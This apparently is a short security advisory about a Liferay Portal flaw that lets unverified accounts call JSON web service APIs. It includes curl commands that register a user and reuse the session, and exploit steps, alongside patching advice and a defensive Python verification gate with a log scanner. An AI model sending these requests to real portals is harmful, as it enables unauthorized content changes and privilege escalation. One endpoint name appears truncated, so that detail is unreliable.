Liferay Portal, Improper Access Control, CVE-2025-XXXX (Moderate)

How the mentioned CVE works:

In affected versions of Liferay Portal, the access control mechanism contains a flaw where API endpoints are not properly gated by the user’s email verification status. Upon account registration, a user is granted a session and associated permissions before completing the required email verification step. This allows a remote attacker to register a new account and immediately interact with APIs that should be restricted to verified users only. The system incorrectly assigns functional permissions pre-verification, enabling unauthorized actions such as accessing, creating, or editing content via the JSON web services API. This bypasses a critical security control, as the portal assumes unverified accounts are untrusted and should have limited system access.
Platform: Liferay Portal/DXP
Version: 7.4.0 – 7.4.3.109
Vulnerability: Improper Access Control
Severity: Moderate
Date: 2025-10-27

Prediction: 2025-11-10

What Undercode Says:

curl -X POST 'http://<target>/api/jsonws/user/add-user' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data 'companyId=1&autoPassword=true&password1=test&password2=test&autoScreenName=true&screenName=testuser&[email protected]&facebookId=0&openId=&locale=en_US&firstName=Test&middleName=&lastName=User&prefixId=0&suffixId=0&male=true&birthdayMonth=1&birthdayDay=1&birthdayYear=1901&job=Test&groupIds=&organizationIds=&roleIds=&userGroupIds=&sendEmail=false'
curl -X GET 'http://<target>/api/jsonws/journal/get-s' \
-b 'JSESSIONID=<session_id_from_registration>'

How to Exploit:

Register a new user account. Use the session ID issued at registration to call privileged APIs before clicking the verification link sent to the email address. Perform unauthorized actions such as creating web content or modifying user permissions through the available service endpoints.

Protection from this CVE:

Upgrade to Liferay Portal version 7.4.3.110 or a patched DXP version. If immediate patching is not possible, implement a reverse proxy or Web Application Firewall (WAF) rule to block access to the `/api/jsonws` endpoint for unauthenticated or newly registered sessions.
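The root cause is a missing check, not a missing role: permissions become effective before the account's email address is verified. The following is an added illustration of the control that is absent, written as a defender's model rather than Liferay's own code. It gates every JSON web service call on the account's verification flag (with a `strict=False` switch that reproduces the flawed ordering described above) and then runs the same gate over a few constructed log lines to flag calls that a patched portal would have refused. The `/api/jsonws/example/...` paths, the `Account` type and the log format are all hypothetical; only the `/api/jsonws` prefix comes from the advisory.

```python
# Added example (not Liferay's code): an email-verification gate for JSON web
# service calls, plus a scanner that flags the bypass pattern in constructed logs.
import re
from dataclasses import dataclass, field


@dataclass
class Account:
    screen_name: str
    email_verified: bool
    roles: set = field(default_factory=set)


# Hypothetical allow-list: the only service paths a self-registered but still
# unverified account may reach (for example, to re-send its verification email).
UNVERIFIED_ALLOWED = {"/api/jsonws/example/resend-verification"}


def authorize_api_call(account: Account, path: str, strict: bool = True):
    """Return (allowed, reason).

    strict=True is the hardened behaviour: nothing under /api/jsonws is
    reachable until the email address is verified, except allow-listed paths.
    strict=False models the flaw the advisory describes: role permissions are
    effective as soon as the registration session exists.
    """
    if not path.startswith("/api/jsonws/"):
        return True, "not a JSON web service call"
    if not strict:
        return True, "permissions granted before verification (vulnerable)"
    if not account.email_verified and path not in UNVERIFIED_ALLOWED:
        return False, "email address not verified"
    return True, "verified account or allow-listed path"


# Constructed access-log lines (not real Liferay output) in a simple
# space-separated format: time, screen name, verification flag, method, path.
SAMPLE_LOG = """\
2025-10-27T10:00:03Z user=testuser verified=false POST /api/jsonws/example/edit-content
2025-10-27T10:00:05Z user=testuser verified=false GET /api/jsonws/example/resend-verification
2025-10-27T10:00:09Z user=testuser verified=false POST /api/jsonws/example/update-role
2025-10-27T10:01:00Z user=alice verified=true POST /api/jsonws/example/edit-content
2025-10-27T10:01:02Z user=testuser verified=false GET /web/guest/home
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) verified=(?P<verified>true|false) "
    r"(?P<method>[A-Z]+) (?P<path>\S+)$"
)


def find_unverified_api_calls(log_text: str):
    """Return (timestamp, user, path) for every JSON web service call made by
    an unverified account that the hardened gate would have refused."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the constructed format
        acct = Account(m["user"], m["verified"] == "true")
        allowed, _ = authorize_api_call(acct, m["path"])
        if not allowed:
            hits.append((m["ts"], m["user"], m["path"]))
    return hits


if __name__ == "__main__":
    for hit in find_unverified_api_calls(SAMPLE_LOG):
        print("unverified account reached JSON web service:", *hit)
```

The gate belongs in the server-side authorization path, not only at a proxy: a WAF rule keyed on "newly registered session" is a stop-gap because the proxy cannot see the verification flag, whereas the application can. The log scan is the same predicate applied retrospectively, which is what an incident responder would use to find accounts that exercised the bypass before the upgrade.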

Impact:

Unauthorized content modification, data integrity loss, privilege escalation. An attacker can deface sites, create malicious content, or alter application data without a verified identity.

Sources:

Reported By: github.com